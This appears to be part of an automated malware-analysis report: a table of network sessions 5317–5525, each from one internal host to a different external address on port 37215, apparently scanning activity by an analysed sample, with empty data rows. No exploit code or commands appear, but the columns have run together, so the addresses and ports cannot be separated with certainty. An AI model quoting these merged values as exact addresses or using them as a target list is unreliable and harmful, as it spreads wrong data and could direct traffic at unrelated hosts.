                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5317192.168.2.1333404197.172.223.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5318192.168.2.13459829.255.46.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5319192.168.2.1333882197.248.90.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5320192.168.2.1343930157.207.223.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5321192.168.2.1340024197.30.210.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5322192.168.2.1342006157.213.62.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5323192.168.2.1341986197.169.3.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5324192.168.2.1337684219.243.153.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5325192.168.2.135926897.151.234.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5326192.168.2.134532241.247.207.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5327192.168.2.1350964119.37.150.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5328192.168.2.1354668210.92.166.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5329192.168.2.1357724197.118.134.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5330192.168.2.1343916157.81.104.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5331192.168.2.1344106197.118.184.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5332192.168.2.135664041.196.103.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5333192.168.2.1349916157.220.233.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5334192.168.2.134726892.195.223.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5335192.168.2.1359224197.202.240.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5336192.168.2.1338110178.172.28.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5337192.168.2.1343216157.55.189.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5338192.168.2.1353016197.223.134.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5339192.168.2.1345212157.251.135.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5340192.168.2.1356564197.22.43.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5341192.168.2.135420441.142.196.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5342192.168.2.135359814.81.183.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5343192.168.2.1342854157.166.10.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5344192.168.2.1342888196.27.199.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5345192.168.2.1338292197.60.156.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5346192.168.2.1351080157.220.185.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5347192.168.2.1333400157.146.106.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5348192.168.2.134379441.59.41.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5349192.168.2.1335128197.156.122.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5350192.168.2.1333384197.75.51.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5351192.168.2.134752641.39.123.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5352192.168.2.136008841.93.224.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5353192.168.2.1346518157.110.87.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5354192.168.2.1352154157.118.44.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5355192.168.2.1353340197.71.212.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5356192.168.2.1351694157.101.46.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5357192.168.2.1358150197.140.64.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5358192.168.2.1352730197.45.192.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5359192.168.2.135964653.79.119.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5360192.168.2.1346232157.136.91.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5361192.168.2.135627487.60.96.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5362192.168.2.1338304197.153.242.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5363192.168.2.1351058204.233.182.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5364192.168.2.1346702197.76.196.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5365192.168.2.133835813.170.195.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5366192.168.2.134966041.201.166.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5367192.168.2.1339628197.17.123.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5368192.168.2.1354212157.234.244.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5369192.168.2.134065841.164.204.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5370192.168.2.1357714157.20.128.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5371192.168.2.1358204157.147.229.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5372192.168.2.1343062201.164.167.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5373192.168.2.1352942156.15.49.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5374192.168.2.1356602157.140.103.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5375192.168.2.134624270.175.14.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5376192.168.2.133772660.98.83.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5377192.168.2.133433241.84.1.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5378192.168.2.135764023.119.68.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5379192.168.2.1348122209.98.127.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5380192.168.2.1335622157.173.60.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5381192.168.2.1341214157.246.230.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5382192.168.2.1344004157.61.228.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5383192.168.2.1340568157.3.163.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5384192.168.2.135874841.109.159.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5385192.168.2.1345168157.163.56.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5386192.168.2.134148071.25.95.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5387192.168.2.1336328197.162.83.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5388192.168.2.1338482181.20.20.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5389192.168.2.1359216157.40.150.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5390192.168.2.1360756197.15.162.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5391192.168.2.1335084116.178.15.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5392192.168.2.1352904129.177.149.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5393192.168.2.1355686197.98.219.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5394192.168.2.1338820197.171.12.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5395192.168.2.134556441.158.85.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5396192.168.2.1348406197.81.17.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5397192.168.2.1339798167.56.41.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5398192.168.2.134355841.56.0.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5399192.168.2.133585641.17.102.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5400192.168.2.134588041.12.63.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5401192.168.2.134852841.150.158.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5402192.168.2.1336198157.25.118.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5403192.168.2.1345390157.84.20.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5404192.168.2.1334730155.168.13.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5405192.168.2.134708617.124.197.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5406192.168.2.1356196166.30.208.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5407192.168.2.1352214197.213.28.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5408192.168.2.1350224157.108.231.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5409192.168.2.1338536157.54.198.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5410192.168.2.135582441.178.64.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5411192.168.2.133782441.203.181.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5412192.168.2.1335608103.232.111.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5413192.168.2.1333260197.110.7.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5414192.168.2.1349996186.210.32.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5415192.168.2.1344018157.36.178.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5416192.168.2.134490841.68.95.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5417192.168.2.1343922197.127.108.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5418192.168.2.134745025.90.3.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5419192.168.2.133287241.84.176.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5420192.168.2.1353944197.242.78.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5421192.168.2.1336088157.11.89.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5422192.168.2.1345048157.4.59.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5423192.168.2.1349896157.91.181.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5424192.168.2.1356546197.213.84.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5425192.168.2.1334742197.46.10.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5426192.168.2.1340836197.81.251.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5427192.168.2.1342530197.24.138.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5428192.168.2.133723212.210.131.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5429192.168.2.1359756157.171.233.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5430192.168.2.1341104157.133.230.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5431192.168.2.133938841.194.153.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5432192.168.2.1338410125.0.144.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5433192.168.2.1342876119.253.171.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5434192.168.2.133345641.148.54.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5435192.168.2.135236218.150.56.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5436192.168.2.1359846157.86.154.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5437192.168.2.135199041.13.255.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5438192.168.2.1360980202.183.44.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5439192.168.2.135112241.77.75.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5440192.168.2.135061441.147.29.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5441192.168.2.1352996197.216.218.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5442192.168.2.1333730118.195.95.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5443192.168.2.1358154197.177.250.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5444192.168.2.135439841.156.129.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5445192.168.2.1344218157.205.183.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5446192.168.2.1341796197.21.50.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5447192.168.2.133470841.99.111.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5448192.168.2.1338616100.225.239.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5449192.168.2.1340020197.38.111.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5450192.168.2.1350990157.132.14.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5451192.168.2.1339884157.77.2.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5452192.168.2.135224613.70.141.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5453192.168.2.135044041.44.107.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5454192.168.2.133701082.13.172.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5455192.168.2.1337962157.175.153.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5456192.168.2.13335041.78.132.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5457192.168.2.1353490157.188.179.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5458192.168.2.1359408197.90.146.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5459192.168.2.1357296197.61.116.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5460192.168.2.135316841.15.139.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5461192.168.2.1357462157.14.146.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5462192.168.2.135220241.160.130.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5463192.168.2.1349512197.87.27.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5464192.168.2.1341540197.255.208.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5465192.168.2.133573683.202.112.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5466192.168.2.13510064.81.25.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5467192.168.2.1340674197.20.9.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5468192.168.2.1347532134.163.7.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5469192.168.2.1333364197.234.67.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5470192.168.2.1334896157.194.97.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5471192.168.2.135548841.61.99.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5472192.168.2.1357760118.91.148.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5473192.168.2.1335230217.134.12.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5474192.168.2.1355134157.209.170.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5475192.168.2.1348082197.242.111.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5476192.168.2.135785054.61.17.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5477192.168.2.1353318157.195.136.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5478192.168.2.1358950157.224.66.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5479192.168.2.1349522157.140.63.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5480192.168.2.1352066119.85.108.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5481192.168.2.133503261.177.236.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5482192.168.2.1357604197.114.148.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5483192.168.2.1355132157.157.15.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5484192.168.2.1349478197.14.53.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5485192.168.2.1349374197.214.22.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5486192.168.2.134047441.146.248.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5487192.168.2.1336042157.56.125.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5488192.168.2.1359922197.246.16.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5489192.168.2.133751280.82.16.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5490192.168.2.1356514222.178.36.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5491192.168.2.1342406157.61.172.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5492192.168.2.135294441.82.179.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5493192.168.2.1355942157.107.70.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5494192.168.2.1336934157.130.209.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5495192.168.2.1358762197.61.37.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5496192.168.2.1359950157.34.177.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5497192.168.2.1334790104.166.160.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5498192.168.2.1334696129.4.131.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5499192.168.2.1351392197.115.147.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5500192.168.2.1352012197.52.229.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5501192.168.2.133955640.237.19.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5502192.168.2.133711241.249.118.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5503192.168.2.1358344135.168.58.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5504192.168.2.1336304157.183.199.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5505192.168.2.133712244.83.6.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5506192.168.2.135583676.149.218.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5507192.168.2.1347730157.101.53.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5508192.168.2.1346894157.109.244.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5509192.168.2.135306241.122.170.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5510192.168.2.1335608157.200.142.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5511192.168.2.134079441.70.62.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5512192.168.2.1344190157.188.40.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5513192.168.2.1351246197.177.206.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5514192.168.2.1334728157.140.237.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5515192.168.2.135771841.41.236.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5516192.168.2.1351696197.45.8.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5517192.168.2.1342974174.186.26.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5518192.168.2.1336072197.176.234.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5519192.168.2.1338812102.77.4.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5520192.168.2.1360490157.229.127.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5521192.168.2.133651841.100.23.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5522192.168.2.1359612157.240.255.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5523192.168.2.1348106157.69.232.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5524192.168.2.1338054157.148.105.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5525192.168.2.135018041.225.120.2737215
                                                  TimestampBytes transferredDirectionData


